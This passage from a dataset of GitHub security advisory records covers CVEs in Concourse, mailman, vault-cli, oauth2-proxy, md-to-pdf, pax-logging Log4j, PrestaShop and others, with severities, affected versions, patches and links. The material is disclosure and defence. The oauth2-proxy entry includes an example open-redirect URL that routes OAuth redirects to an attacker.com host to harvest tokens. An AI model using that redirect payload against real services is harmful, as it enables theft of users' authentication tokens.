'2021-12-02T14:45:03Z', 'nvd_published_at': '2020-09-14T17:15:00Z'}" +1.4.0,GHSA-627p-rr78-99rj,2021-05-24T17:56:03Z,2021-12-20T17:56:03Z,,['CVE-2020-5415'],"GitLab auth uses full name instead of username as user ID, allowing impersonation","### Impact + +Installations which use the GitLab auth connector are vulnerable to identity spoofing by way of configuring a GitLab account with the same full name as another GitLab user who is granted access to a Concourse team by having their full name listed under `users` in the team configuration or given to the `--gitlab-user` flag. + +See the [GitLab auth docs](https://concourse-ci.org/gitlab-auth.html) for details. + +Concourse installations which do not configure the GitLab auth connector are not affected. + +### Patches + +Concourse [v6.3.1](https://github.com/concourse/concourse/releases/tag/v6.3.1) and [v6.4.1](https://github.com/concourse/concourse/releases/tag/v6.4.1) were both released with a fix on August 4th, 2020. + +Both versions change the GitLab connector to use the username, rather than the full name. This was always the intent, and the previous behavior was originally reported as a bug (concourse/dex#7) prior to being reported as a security issue. + +Any Concourse teams which configure GitLab users will have to switch each user from their full name to their username upon upgrading to these versions. + +### Workarounds + +GitLab groups do not have this vulnerability, so GitLab users may be moved into groups which are then configured in the Concourse team. + +### References + +* concourse/dex#12: PR with the fix + +### For more information + +If you have any questions or comments about this advisory, you may reach us privately at [concourseteam+security@gmail.com](mailto:concourseteam+security@gmail.com).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/concourse/concourse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.4.0'}, {'fixed': '6.4.1'}]}], 'versions': ['6.4.0']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/concourse/concourse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3.0'}, {'fixed': '6.3.1'}]}], 'versions': ['6.3.0']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/concourse/dex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.4.0'}, {'fixed': '6.4.1'}]}], 'versions': ['6.4.0']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/concourse/dex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3.0'}, {'fixed': '6.3.1'}]}], 'versions': ['6.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/concourse/concourse/security/advisories/GHSA-627p-rr78-99rj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5415'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2020-5415'}]","{'cwe_ids': ['CWE-290'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T17:56:03Z', 'nvd_published_at': None}" +1.4.0,GHSA-xq58-69h2-765m,2021-12-06T21:52:30Z,2021-12-16T15:27:06Z,,['CVE-2021-44227'],Cross Site Request Forgery in mailman,"In GNU Mailman before 2.1.38, a list member or moderator can get a CSRF token and craft an admin request (using that token) to set a new admin password or make other changes.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'mailman'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.38'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-44227'}, {'type': 'WEB', 'url': 'https://bugs.launchpad.net/mailman/+bug/1952384'}, {'type': 'PACKAGE', 'url': 'https://gitlab.com/mailman/mailman'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/06/msg00011.html'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T21:52:30Z', 'nvd_published_at': '2021-12-02T03:15:00Z'}" +1.4.0,GHSA-q34h-97wf-8r8j,2022-01-04T19:42:10Z,2021-12-16T21:02:12Z,,['CVE-2021-43837'],vault-cli contains possible RCE when reading user-defined data,"### Impact +_What kind of vulnerability is it? Who is impacted?_ + +vault-cli features the ability for rendering templated values (as explained in the [documentation](https://github.com/peopledoc/vault-cli/blob/2.2.1/docs/howto/templated_secrets.rst)). When a secret starts with the prefix `!template!`, vault-cli interprets the rest of the contents of the secret as a Jinja2 template. +Jinja2 is a powerful templating engine and it's not designed to safely render arbitrary templates. An attacker controlling a jinja2 template rendered on a machine can trigger arbitrary code, making this a Remote Code Execution (RCE) risk. +If the content of the vault can be completely trusted, then this is not a problem. Otherwise, if your threat model includes cases where an attacker can manipulate a secret value read from the vault using vault-cli, then this vulnerability may impact you. + +This does not impact `vault` itself, except for the fact that the attacker, having an RCE on the machine that executes `vault-cli`, may abuse the token that `vault-cli` uses, to read, write or delete other data from the vault. + +### Patches +_Has the problem been patched? What versions should users upgrade to?_ + +In 3.0.0, the code related to interpreting vault templated secrets has been removed entirely. + +### Workarounds +_Is there a way for users to fix or remediate the vulnerability without upgrading?_ + +Using the environment variable `VAULT_CLI_RENDER=false` or the flag `--no-render` (placed between `vault-cli` and the subcommand, e.g. `vault-cli --no-render get-all`) or adding `render: false` to the vault-cli configuration yaml file disables rendering and removes the vulnerability. +Using the python library, you can use: `vault_cli.get_client(render=False)` when creating your client to get a client that will not render templated secrets and thus operates securely. + +### References +_Are there any links users can visit to find out more?_ + +Here's an article explaining how jinja2 templates might be exploited to have side effects: https://podalirius.net/en/publications/grehack-2021-optimizing-ssti-payloads-for-jinja2/ + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [the vault-cli repo](https://github.com/peopledoc/vault-cli/issues/new) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vault-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/peopledoc/vault-cli/security/advisories/GHSA-q34h-97wf-8r8j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43837'}, {'type': 'WEB', 'url': 'https://github.com/peopledoc/vault-cli/pull/198'}, {'type': 'WEB', 'url': 'https://github.com/peopledoc/vault-cli/commit/3ba3955887fd6b7d4d646c8b260f21cebf5db852'}, {'type': 'PACKAGE', 'url': 'https://github.com/peopledoc/vault-cli'}, {'type': 'WEB', 'url': 'https://github.com/peopledoc/vault-cli/releases/tag/3.0.0'}, {'type': 'WEB', 'url': 'https://podalirius.net/en/publications/grehack-2021-optimizing-ssti-payloads-for-jinja2/'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-16T19:28:49Z', 'nvd_published_at': '2021-12-16T19:15:00Z'}" +1.4.0,GHSA-f545-vpwp-r9j7,2021-12-03T15:18:14Z,2021-12-03T20:41:35Z,,['CVE-2021-3989'],showdoc is vulnerable to URL Redirection to Untrusted Site,showdoc is vulnerable to URL Redirection to Untrusted Site.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3989'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/335afc7ed6d6627c3d0434aa9acc168c77117614'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ffc61eff-efea-42c5-92c2-e043fdf904d5'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T20:39:26Z', 'nvd_published_at': '2021-12-01T11:15:00Z'}" +1.4.0,GHSA-qqxw-m5fj-f7gv,2021-05-24T21:20:17Z,2021-12-20T18:02:38Z,,['CVE-2020-5233'],"The pattern '/\domain.com' is not disallowed when redirecting, allowing for open redirect","### Impact +An open redirect vulnerability has been found in `oauth2_proxy`. Anyone who uses `oauth2_proxy` may potentially be impacted. + +For a context [detectify] have an in depth blog post about the potential impact of an open redirect. Particularly see the OAuth section. + +**tl;dr**: People's authentication tokens could be silently harvested by an attacker. e.g: +`facebook.com/oauth.php?clientid=123&state=abc&redirect_url=https://yourdomain.com/red.php?url%3dhttps://attacker.com/` + +### Patches + +@sauyon found the issue, and has submitted a patch. + +``` +diff --git a/oauthproxy.go b/oauthproxy.go +index 72ab580..f420df6 100644 +--- a/oauthproxy.go ++++ b/oauthproxy.go +@@ -517,7 +517,7 @@ func (p *OAuthProxy) GetRedirect(req *http.Request) (redirect string, err error) + // IsValidRedirect checks whether the redirect URL is whitelisted + func (p *OAuthProxy) IsValidRedirect(redirect string) bool { + switch { +- case strings.HasPrefix(redirect, ""/"") && !strings.HasPrefix(redirect, ""//""): ++ case strings.HasPrefix(redirect, ""/"") && !strings.HasPrefix(redirect, ""//"") && !strings.HasPrefix(redirect, ""/\\""): + return true + case strings.HasPrefix(redirect, ""http://"") || strings.HasPrefix(redirect, ""https://""): + redirectURL, err := url.Parse(redirect) +``` + +This patch will be applied to the next release, which is scheduled for when this is publicly disclosed. + +### Workarounds + +At this stage there is no work around.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/oauth2-proxy/oauth2-proxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-qqxw-m5fj-f7gv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5233'}, {'type': 'WEB', 'url': 'https://github.com/oauth2-proxy/oauth2_proxy/commit/a316f8a06f3c0ca2b5fc5fa18a91781b313607b2'}, {'type': 'WEB', 'url': 'https://blog.detectify.com/2019/05/16/the-real-impact-of-an-open-redirect/'}, {'type': 'WEB', 'url': 'https://github.com/oauth2-proxy/oauth2_proxy/releases/tag/v5.0.0'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T21:20:17Z', 'nvd_published_at': None}" +1.4.0,GHSA-x949-7cm6-fm6p,2021-12-15T15:22:46Z,2021-12-16T14:34:40Z,,['CVE-2021-23639'],Code Injection in md-to-pdf.,"The package md-to-pdf before 5.0.0 are vulnerable to Remote Code Execution (RCE) due to utilizing the library gray-matter to parse front matter content, without disabling the JS engine.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'md-to-pdf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23639'}, {'type': 'WEB', 'url': 'https://github.com/simonhaenisch/md-to-pdf/issues/99'}, {'type': 'WEB', 'url': 'https://github.com/simonhaenisch/md-to-pdf/commit/a716259c548c82fa1d3b14a3422e9100619d2d8a'}, {'type': 'PACKAGE', 'url': 'https://github.com/simonhaenisch/md-to-pdf'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MDTOPDF-1657880'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-14T14:31:35Z', 'nvd_published_at': '2021-12-10T20:15:00Z'}" +1.4.0,GHSA-67c7-5v9j-227r,2021-12-03T15:16:39Z,2021-12-03T20:43:06Z,,['CVE-2021-3983'],Cross-site Scripting in kimai2,kimai2 is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kevinpapst/kimai2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3983'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/commit/89bfa82c61da0d3639e4038e689e25467baac8a0'}, {'type': 'PACKAGE', 'url': 'https://github.com/kevinpapst/kimai2'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/releases/tag/1.16.3'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c96f3480-dccf-4cc2-99a4-d2b3a7462413'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T19:29:53Z', 'nvd_published_at': '2021-12-01T12:15:00Z'}" +1.4.0,GHSA-g7p8-r2ch-4rmf,2022-01-04T18:56:53Z,2021-12-17T20:41:45Z,,['CVE-2020-35215'],Malicious Atomix node queries expose sensitive information,An issue in Atomix v3.1.5 allows attackers to access sensitive information when a malicious Atomix node queries distributed variable primitives which contain the entire primitive lists that ONOS nodes use to share important states.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.atomix:atomix'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35215'}, {'type': 'WEB', 'url': 'https://docs.google.com/presentation/d/1pRRLfdSUqUZ688CZ9e9AyceuXPGp9oyGj7j4bdSsBcw/edit?usp=sharing'}, {'type': 'PACKAGE', 'url': 'https://github.com/atomix/atomix'}]","{'cwe_ids': ['CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-17T19:00:58Z', 'nvd_published_at': '2021-12-16T20:15:00Z'}" +1.4.0,GHSA-33gc-6cw9-w3g4,2023-09-19T10:02:42Z,2021-12-10T20:23:19Z,,['CVE-2021-36564'],Deserialization of Untrusted Data in topthink/framework,ThinkPHP v6.0.8 was discovered to contain a deserialization vulnerability via the component vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'topthink/framework'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36564'}, {'type': 'WEB', 'url': 'https://github.com/top-think/framework/issues/2559'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-08T20:30:33Z', 'nvd_published_at': '2021-12-06T21:15:00Z'}" +1.4.0,GHSA-2jhh-5xm2-j4gf,2021-12-06T22:11:44Z,2021-12-10T20:17:55Z,,['CVE-2021-43415'],Improper Authentication in HashiCorp Nomad,"HashiCorp Nomad and Nomad Enterprise up to 1.0.13, 1.1.7, and 1.2.0, with the QEMU task driver enabled, allowed authenticated users with job submission capabilities to bypass the configured allowed image paths. Fixed in 1.0.14, 1.1.8, and 1.2.1.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.14'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.1.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43415'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-31-nomad-qemu-task-driver-allowed-paths-bypass-with-job-args/32288'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/nomad'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/nomad'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-06T22:11:44Z', 'nvd_published_at': '2021-12-03T22:15:00Z'}" +1.4.0,GHSA-h3cw-g4mq-c5x2,2022-04-22T18:19:50Z,2021-12-09T19:14:51Z,,['CVE-2020-24616'],Code Injection in jackson-databind,"This project contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.10.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24616'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2814'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/3d97153944f7de9c19c1b3637b33d3cf1fbbe4d7'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200904-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-502', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T17:38:11Z', 'nvd_published_at': '2020-08-25T18:15:00Z'}" +1.4.0,GHSA-25f5-gc4h-hc22,2023-09-05T21:51:12Z,2021-12-08T19:55:30Z,,['CVE-2021-28680'],Improper Privilege Management in devise_masquerade,"The devise_masquerade gem before 1.3 allows certain attacks when a password's salt is unknown. An application that uses this gem to let administrators masquerade/impersonate users loses one layer of security protection compared to a situation where Devise (without this extension) is used. If the server-side `secret_key_base` value became publicly known (for instance if it is committed to a public repository by mistake), there are still other protections in place that prevent an attacker from impersonating any user on the site. When masquerading is not used in a plain Devise application, one must know the password salt of the target user if one wants to encrypt and sign a valid session cookie. When `devise_masquerade` is used, however, an attacker can decide which user the ""back"" action will go back to without knowing that user's password salt and simply knowing the user ID, by manipulating the session cookie and pretending that a user is already masqueraded by an administrator.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'devise_masquerade'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28680'}, {'type': 'WEB', 'url': 'https://github.com/oivoodoo/devise_masquerade/issues/83'}, {'type': 'WEB', 'url': 'https://github.com/oivoodoo/devise_masquerade/pull/76'}, {'type': 'PACKAGE', 'url': 'https://github.com/oivoodoo/devise_masquerade'}, {'type': 'WEB', 'url': 'https://github.com/oivoodoo/devise_masquerade/releases/tag/v1.3.1'}, {'type': 'WEB', 'url': 'https://labanskoller.se/blog/2021/03/23/the-devise-extension-that-peeled-off-one-layer-of-the-security-onion-cve-2021-28680/'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-12-08T19:36:08Z', 'nvd_published_at': '2021-12-07T21:15:00Z'}" +1.4.0,GHSA-3p94-vj97-fm4q,2021-05-25T16:28:38Z,2021-12-09T19:56:44Z,,['CVE-2020-7615'],OS Command Injection in fsa,"fsa through 0.5.1 is vulnerable to Command Injection. The first argument of 'execGitCommand()', located within 'lib/rep.js#63' can be controlled by users without any sanitization to inject arbitrary commands.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'fsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7615'}, {'type': 'WEB', 'url': 'https://github.com/gregof/fsa/blob/master/lib/rep.js#L12'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FSA-564118'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T16:28:38Z', 'nvd_published_at': '2020-04-07T14:15:00Z'}" +1.4.0,GHSA-vrgh-5w3c-ggf8,2021-12-03T15:18:33Z,2021-12-03T20:38:50Z,,['CVE-2021-3990'],showdoc is vulnerable to Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG),showdoc is vulnerable to Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3990'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/a9886f26c08225e0adca75c67dfca3f7c42b87d0'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/0680067d-56a7-4412-b06e-a267e850ae9f'}]","{'cwe_ids': ['CWE-338'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-12-02T21:16:12Z', 'nvd_published_at': '2021-12-01T11:15:00Z'}" +1.4.0,GHSA-fxwm-rx68-p5vx,2021-11-29T20:55:04Z,2021-12-01T18:28:29Z,,[],XSS in richtext custom tag attributes in ezsystems/ezplatform-richtext,"The rich text editor does not escape attribute data when previewing custom tags. This means XSS is possible if custom tags are used, for users who have access to editing rich text content. Frontend content view is not affected, but the vulnerability could be used by editors to attack other editors. The fix ensures custom tag attribute data is escaped in the editor.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform-richtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezplatform-richtext/security/advisories/GHSA-fxwm-rx68-p5vx'}, {'type': 'WEB', 'url': 'https://github.com/ezsystems/ezplatform-richtext/commit/3cebfe2ae4c22e6590632a0ff71893854a16afc5'}, {'type': 'WEB', 'url': 'https://developers.ibexa.co/security-advisories/ibexa-sa-2021-010-xss-in-richtext-custom-tag-attributes'}, {'type': 'PACKAGE', 'url': 'https://github.com/ezsystems/ezplatform-richtext'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-29T20:53:09Z', 'nvd_published_at': None}" +1.4.0,GHSA-f78f-353m-cf4j,2021-07-29T16:13:17Z,2021-12-10T20:05:37Z,,['CVE-2020-7609'],Code Injection in node-rules,"node-rules including 3.0.0 and prior to 5.0.0 allows injection of arbitrary commands. The argument rules of function ""fromJSON()"" can be controlled by users without any sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-rules'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '5.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7609'}, {'type': 'WEB', 'url': 'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832'}, {'type': 'WEB', 'url': 'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832,'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODERULES-560426'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:34:33Z', 'nvd_published_at': '2020-04-27T22:15:00Z'}" +1.4.0,GHSA-w7fj-336r-vw49,2021-12-01T14:35:30Z,2021-12-01T18:29:21Z,,['CVE-2021-43776'],Cross-Site Scripting vulnerability in @backstage/plugin-auth-backend,"### Impact +This vulnerability allows a malicious actor to trick another user into visiting a vulnerable URL that executes an XSS attack. This attack can potentially allow the attacker to exfiltrate access tokens or other secrets from the user's browser. The default CSP does prevent this attack, but it is expected that some deployments have these policies disabled due to incompatibilities. + +### Patches +This is vulnerability is patched in version `0.4.9` of `@backstage/plugin-auth-backend`. + +### For more information +If you have any questions or comments about this advisory: + +* Open an issue in the [Backstage repository](https://github.com/backstage/backstage) +* Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@backstage/plugin-auth-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/backstage/backstage/security/advisories/GHSA-w7fj-336r-vw49'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43776'}, {'type': 'PACKAGE', 'url': 'https://github.com/backstage/backstage'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/tree/master/plugins/auth-backend'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-29T19:19:57Z', 'nvd_published_at': '2021-11-26T19:15:00Z'}" +1.4.0,GHSA-xxfh-x98p-j8fr,2021-12-11T21:25:16Z,2021-12-10T20:15:37Z,,[],Remote code injection in Log4j (through pax-logging-log4j2),"### Impact +Remote Code Execution. + +### Patches +Users of pax-logging 1.11.9 should update to 1.11.10. +Users of pax-logging 2.0.10 should update to 2.0.11. + +### Workarounds +Set system property `-Dlog4j2.formatMsgNoLookups=true` + +### References +https://github.com/advisories/GHSA-jfh8-c2jp-5v3q + +",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.ops4j.pax.logging:pax-logging-log4j2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.ops4j.pax.logging:pax-logging-log4j2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ops4j/org.ops4j.pax.logging/security/advisories/GHSA-xxfh-x98p-j8fr'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-jfh8-c2jp-5v3q'}, {'type': 'PACKAGE', 'url': 'https://github.com/ops4j/org.ops4j.pax.logging'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-12-10T18:54:56Z', 'nvd_published_at': None}" +1.4.0,GHSA-6xxj-gcjq-wgf4,2021-12-08T19:28:53Z,2021-12-07T21:23:17Z,,['CVE-2021-43789'],SQL injection in prestashop/prestashop,"### Impact +Blind SQLi using Search filters with `orderBy` and `sortOrder` parameters + +### Patches +The problem is fixed 